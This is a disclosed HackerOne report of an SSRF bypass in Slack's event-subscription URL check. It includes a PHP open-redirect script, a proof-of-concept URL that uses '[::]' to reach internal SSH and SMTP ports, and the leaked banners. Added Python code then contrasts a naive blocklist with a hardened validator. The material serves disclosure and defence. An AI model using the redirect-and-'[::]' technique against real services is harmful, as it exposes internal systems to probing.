HackerOne report #386292 by elber
Jul 24, 2018 - 3:39 p.m.

Slack: Bypass of the SSRF protection in Event Subscriptions parameter.


The vulnerability is present in the “Event Subscriptions” parameter, where:
"Your app can subscribe to be notified of events in Slack (for example, when a user adds a reaction or creates a file) at a URL you choose."
URL:
https://api.slack.com/apps/YOURAPPCODE/event-subscriptions?

When we add a site that does not meet API standards, we receive the following message:
{F323999}

Your request URL gave us a 500 error. Update your URL to receive a new request and challenge value.

After testing several SSRF techniques, I found a bypass for this protection using the IPv6 vector [::].

On my host, x.php has:

<?php
// Open redirect: send the caller on to whatever URL is passed in ?u=
header("Location: " . $_GET['u']);
?>

PoC:

http://hacker.site/x.php/?u=http://[::]:22/

Response:
SSH [::]:22

{F324002}

"body": {
 SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
Protocol mismatch.
 
}

SMTP [::]:25

{F324001}

"body": {
 220 squid-iad-ypfw.tinyspeck.com ESMTP Postfix
221 2.7.0 Error: I can break rules, too. Goodbye.
 
}

Non-existent port:
{F324000}

Impact

In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources, scan for internal ports, and obtain the versions of the services running on the server.

References: https://www.owasp.org/index.php/Server_Side_Request_Forgery
https://hackerone.com/reports/61312
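The two weaknesses the report exploits are (1) a host check that looks at the URL string rather than at the address it connects to, so the IPv6 unspecified address "[::]" slips past a blocklist built for "localhost"/"127.0.0.1"/"::1", and (2) a check that runs only on the URL the app owner submitted, while the HTTP client then follows the open redirect on hacker.site to the local SSH and SMTP ports. The example below is added here and is not Slack's code or the reporter's; the naive blocklist is a hypothetical stand-in for whatever check was actually in place. It puts that naive check beside a hardened one that allowlists scheme and port, resolves the host, and rejects every loopback, unspecified, link-local, private and IPv4-mapped address, and it re-validates each redirect hop. It generalises beyond the report's "[::]" vector to "[::1]", "[::ffff:127.0.0.1]" and 169.254.169.254. DNS (hacker.site resolving to a documentation-range address) and the attacker's x.php redirector are constructed stand-ins so the code runs offline.

```python
import ipaddress
import socket
from urllib.parse import parse_qs, urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Hypothetical string blocklist of the kind a naive SSRF filter uses.
# "[::]" (the IPv6 unspecified address) is not in it, yet connecting to it
# reaches the local host, which is exactly the bypass in the report.
NAIVE_BLOCKLIST = {"localhost", "127.0.0.1", "::1"}

# Address ranges a webhook target must never resolve to. Listed explicitly
# rather than via ipaddress.is_private so that the documentation range used
# by the constructed resolver below (203.0.113.0/24) still counts as public.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "ff00::/8",
)]


def naive_check(url):
    """Weak check: compares the host string against a blocklist, nothing else."""
    parts = urlsplit(url)
    return parts.scheme in ALLOWED_SCHEMES and (parts.hostname or "") not in NAIVE_BLOCKLIST


def is_public_address(addr):
    """True only if addr lies outside every blocked range (after unmapping ::ffff:a.b.c.d)."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not any(addr in net for net in BLOCKED_NETS if net.version == addr.version)


def system_resolve(host):
    """Default resolver: every address getaddrinfo returns for host."""
    return [ipaddress.ip_address(ai[4][0]) for ai in socket.getaddrinfo(host, None)]


def hardened_check(url, resolve=system_resolve):
    """Scheme/port allowlist, then an address-level check on the literal IP or on every resolved address."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:  # malformed port
        return False
    if port not in ALLOWED_PORTS:
        return False
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]  # literal IP, incl. bracketed IPv6
    except ValueError:
        try:
            addrs = resolve(parts.hostname)
        except (socket.gaierror, OSError):
            return False
    return bool(addrs) and all(is_public_address(a) for a in addrs)


def fetch_with_validation(url, fetch, resolve=system_resolve, max_hops=3):
    """Follow redirects by hand so every hop, not just the first URL, is checked.

    fetch(url) -> (status, location) is injected so the example runs offline.
    Returns ("fetched", final_url) or ("blocked", offending_url).
    """
    for _ in range(max_hops + 1):
        if not hardened_check(url, resolve):
            return ("blocked", url)
        status, location = fetch(url)
        if status in (301, 302, 303, 307, 308) and location:
            url = location if urlsplit(location).scheme else urljoin(url, location)
            continue
        return ("fetched", url)
    return ("blocked", url)  # redirect loop or too many hops


# --- Constructed stand-ins for DNS and the attacker's redirector (not real lookups) ---

POC_URL = "http://hacker.site/x.php/?u=http://[::]:22/"
FAKE_DNS = {"hacker.site": [ipaddress.ip_address("203.0.113.10")]}  # documentation range


def fake_resolve(host):
    if host in FAKE_DNS:
        return FAKE_DNS[host]
    raise socket.gaierror(f"constructed resolver has no record for {host}")


def fake_fetch(url):
    """Behaves like the report's x.php: 302 to whatever the u= parameter says."""
    parts = urlsplit(url)
    if parts.hostname == "hacker.site" and parts.path.startswith("/x.php"):
        return (302, parse_qs(parts.query).get("u", [None])[0])
    return (200, None)


if __name__ == "__main__":
    print("naive allows PoC URL:     ", naive_check(POC_URL))                          # True
    print("naive allows http://[::]/:", naive_check("http://[::]/"))                   # True
    print("hardened http://[::]/:    ", hardened_check("http://[::]/", fake_resolve))  # False
    print("hardened follow of PoC:   ", fetch_with_validation(POC_URL, fake_fetch, fake_resolve))
```

Two caveats a practitioner should keep in mind. Resolving the name once for the check and again when the HTTP client connects leaves a DNS-rebinding window; production code should connect to the address it validated rather than re-resolve. And port restriction matters on its own: even if the address check were perfect, the report's SSH and SMTP banners were only reachable because the fetcher would connect to any port the URL named.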